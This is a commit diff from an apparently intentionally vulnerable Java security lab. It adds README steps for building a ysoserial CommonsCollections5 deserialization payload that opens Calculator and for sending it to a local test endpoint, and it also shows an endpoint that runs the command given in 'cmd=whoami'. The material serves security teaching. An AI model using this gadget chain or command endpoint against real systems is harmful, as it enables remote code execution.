update deserialize

JoyChou93 · JoyChou93 · commit 4b7587699afc · 2018-07-13T22:23:24.000+08:00
diff --git a/README.md b/README.md
@@ -57,4 +57,18 @@ http://localhost:8080/rce/exec?cmd=whoami
 
 ``` 
 Viarus
-```
+```
+
+## 说明
+
+### 反序列化
+
+利用ysoserial构造POC
+
+``` 
+git clone https://github.com/frohoff/ysoserial.git
+mvn clean package -DskipTests
+java -jar /Users/Viarus/Downloads/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 'open /Applications/Calculator.app' > /tmp/poc
+```
+
+访问`http://localhost:8080/deserialize/test`即可弹窗
diff --git a/poc b/poc
diff --git a/src/main/java/org/joychou/controller/Deserialize.java b/src/main/java/org/joychou/controller/Deserialize.java
@@ -12,7 +12,7 @@
 /**
  * @author: JoyChou
  * @Date:   2018年06月14日
- * @Desc：  将根目录的poc放到/tmp/poc就能在mac上弹计算器。该应用必须有Commons-Collections包才能利用反序列化。
+ * @Desc：  该应用必须有Commons-Collections包才能利用反序列化。
  */
 
 @Controller
